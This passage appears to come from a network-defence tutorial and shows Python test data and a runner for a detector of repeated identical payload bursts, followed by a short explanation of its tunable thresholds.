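    (short handshake, then seven identical 1500-byte chunks 10 ms apart);
    a second client sends seven distinct chunks and must not be flagged."""
    big = b"A" * 1500
    chunks = [DataChunk(0.000, "10.0.0.5", SERVICE_PORT, b"handshake")]
    chunks += [DataChunk(0.010 * (i + 1), "10.0.0.5", SERVICE_PORT, big)
               for i in range(7)]
    chunks += [DataChunk(0.010 * (i + 1), "10.0.0.9", SERVICE_PORT,
                         b"B" * 1500 + bytes([i]))
               for i in range(7)]
    return chunks


if __name__ == "__main__":
    for src, port, fp, n in find_payload_bursts(sample_chunks()):
        print(f"burst: {src} -> {port} payload {fp} repeated {n}x")
```

The thresholds are the tunable part: `min_repeats` and `window_s` come straight from the loop above (seven sends, well under a second), while `min_len` keeps legitimate short retries out of the result. On a real sensor the records would come from a flow or packet source rather than `sample_chunks()`.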
